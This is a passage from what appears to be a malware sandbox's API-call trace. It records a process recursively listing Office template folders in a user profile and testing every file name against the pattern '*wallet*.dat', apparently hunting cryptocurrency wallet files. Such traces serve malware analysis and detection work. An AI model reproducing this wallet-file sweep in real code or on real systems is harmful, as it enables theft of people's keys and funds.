ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x371abc, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM04033937[[fn=Vapor Trail]].thmx", cAlternateFileName="TM0403~2.THM")) returned 1 [0175.492] PathMatchSpecA (pszFile="TM04033937[[fn=Vapor Trail]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.492] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033937[[fn=vapor trail]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x9800b4e9, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9800b4e9, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x4f742400, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x371abc, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.492] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98742454, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98742454, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x973bdf00, ftLastWriteTime.dwHighDateTime=0x1d4196d, nFileSizeHigh=0x0, nFileSizeLow=0x10a79d, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM10001114[[fn=Gallery]].thmx", cAlternateFileName="TM1000~2.THM")) returned 1 [0175.492] PathMatchSpecA (pszFile="TM10001114[[fn=Gallery]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.493] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001114[[fn=gallery]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x98742454, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98742454, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x973bdf00, ftLastWriteTime.dwLowDateTime=0x1d4196d, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x10a79d, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="1", cAlternateFileName="C")) returned 0xffffffff [0175.493] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9860260f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9860260f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x235700, ftLastWriteTime.dwHighDateTime=0x1d4196e, nFileSizeHigh=0x0, nFileSizeLow=0x9477a, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM10001115[[fn=Parcel]].thmx", cAlternateFileName="TM1000~1.THM")) returned 1 [0175.493] PathMatchSpecA (pszFile="TM10001115[[fn=Parcel]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.493] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001115[[fn=parcel]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x9860260f, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9860260f, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x235700, ftLastWriteTime.dwLowDateTime=0x1d4196e, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x9477a, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="1", cAlternateFileName="C")) returned 0xffffffff [0175.493] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9860260f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9860260f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x235700, ftLastWriteTime.dwHighDateTime=0x1d4196e, nFileSizeHigh=0x0, nFileSizeLow=0x9477a, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM10001115[[fn=Parcel]].thmx", cAlternateFileName="TM1000~1.THM")) returned 0 [0175.493] FindClose (in: hFindFile=0x4eac10 | out: hFindFile=0x4eac10) returned 1 [0175.494] FindNextFileA (in: hFindFile=0x4eabd0, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x4c0260, cFileName="1033", cAlternateFileName="")) returned 0 [0175.494] FindClose (in: hFindFile=0x4eabd0 | out: hFindFile=0x4eabd0) returned 1 [0175.494] FindNextFileA (in: hFindFile=0x4ead50, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2000002, cFileName="SmartArt Graphics", cAlternateFileName="SMARTA~1")) returned 1 [0175.495] PathMatchSpecA (pszFile="SmartArt Graphics", pszSpec="*wallet*.dat") returned 0 [0175.495] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\*"), lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9477a, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x4eab50 [0175.497] FindNextFileA (in: hFindFile=0x4eab50, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9477a, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0175.497] FindNextFileA (in: hFindFile=0x4eab50, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9477a, dwReserved1=0x207d0, cFileName="1033", cAlternateFileName="")) returned 1 [0175.497] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0175.497] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4ea750 [0175.589] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.591] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97837aab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97837aab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97837aab, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1697, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328884[[fn=architecture]].glox", cAlternateFileName="TM0332~4.GLO")) returned 1 [0175.591] PathMatchSpecA (pszFile="TM03328884[[fn=architecture]].glox", pszSpec="*wallet*.dat") returned 0 [0175.591] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328884[[fn=architecture]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x97837aab, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97837aab, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x97837aab, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1697, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.591] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fe91ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97fe91ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97fea554, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xfba, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328893[[fn=BracketList]].glox", cAlternateFileName="TME5C2~1.GLO")) returned 1 [0175.591] PathMatchSpecA (pszFile="TM03328893[[fn=BracketList]].glox", pszSpec="*wallet*.dat") returned 0 [0175.592] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328893[[fn=bracketlist]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x97fe91ef, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97fe91ef, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x97fea554, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xfba, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.592] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9776d1cd, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9776d1cd, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9776d1cd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1093, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328905[[fn=Chevron Accent]].glox", cAlternateFileName="TM0332~2.GLO")) returned 1 [0175.592] PathMatchSpecA (pszFile="TM03328905[[fn=Chevron Accent]].glox", pszSpec="*wallet*.dat") returned 0 [0175.592] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328905[[fn=chevron accent]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x9776d1cd, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9776d1cd, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9776d1cd, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1093, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.592] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97706a49, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97706a49, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97707caf, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x41a6, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328908[[fn=Circle Process]].glox", cAlternateFileName="TM0332~1.GLO")) returned 1 [0175.592] PathMatchSpecA (pszFile="TM03328908[[fn=Circle Process]].glox", pszSpec="*wallet*.dat") returned 0 [0175.592] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328908[[fn=Circle Process]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328908[[fn=circle process]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x97706a49, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97706a49, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x97707caf, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x41a6, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.592] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97de9b8d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97de9b8d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97deae93, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2c74, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328916[[fn=Converging Text]].glox", cAlternateFileName="TMF131~1.GLO")) returned 1 [0175.592] PathMatchSpecA (pszFile="TM03328916[[fn=Converging Text]].glox", pszSpec="*wallet*.dat") returned 0 [0175.592] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328916[[fn=converging text]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x97de9b8d, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97de9b8d, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x97deae93, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2c74, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.592] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98433dab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98433dab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98435131, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1788, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328919[[fn=Hexagon Radial]].glox", cAlternateFileName="TM6EE1~1.GLO")) returned 1 [0175.592] PathMatchSpecA (pszFile="TM03328919[[fn=Hexagon Radial]].glox", pszSpec="*wallet*.dat") returned 0 [0175.593] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328919[[fn=hexagon radial]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x98433dab, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98433dab, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98435131, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1788, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.593] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98403091, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98403091, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98404408, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x23e7, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328925[[fn=Interconnected Block Process]].glox", cAlternateFileName="TM5FE4~1.GLO")) returned 1 [0175.593] PathMatchSpecA (pszFile="TM03328925[[fn=Interconnected Block Process]].glox", pszSpec="*wallet*.dat") returned 0 [0175.593] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328925[[fn=interconnected block process]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x98403091, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98403091, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98404408, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x23e7, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.593] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984400fa, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984400fa, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x984400fa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x10e6, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328932[[fn=Picture Frame]].glox", cAlternateFileName="TMD322~1.GLO")) returned 1 [0175.593] PathMatchSpecA (pszFile="TM03328932[[fn=Picture Frame]].glox", pszSpec="*wallet*.dat") returned 0 [0175.593] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328932[[fn=Picture Frame]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328932[[fn=picture frame]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x984400fa, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x984400fa, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x984400fa, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x10e6, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.593] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980f6e44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980f6e44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980f6e44, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1cca, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328935[[fn=Picture Organization Chart]].glox", cAlternateFileName="TMB8BB~1.GLO")) returned 1 [0175.593] PathMatchSpecA (pszFile="TM03328935[[fn=Picture Organization Chart]].glox", pszSpec="*wallet*.dat") returned 0 [0175.593] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328935[[fn=picture organization chart]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x980f6e44, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x980f6e44, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x980f6e44, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1cca, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.593] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9824557b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9824557b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9824557b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x15dc, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328940[[fn=Radial Picture List]].glox", cAlternateFileName="TMC309~1.GLO")) returned 1 [0175.593] PathMatchSpecA (pszFile="TM03328940[[fn=Radial Picture List]].glox", pszSpec="*wallet*.dat") returned 0 [0175.594] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328940[[fn=radial picture list]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x9824557b, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9824557b, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9824557b, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x15dc, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.594] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978020a2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978020a2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x978034d1, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328951[[fn=Tabbed Arc]].glox", cAlternateFileName="TM0332~3.GLO")) returned 1 [0175.594] PathMatchSpecA (pszFile="TM03328951[[fn=Tabbed Arc]].glox", pszSpec="*wallet*.dat") returned 0 [0175.594] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed 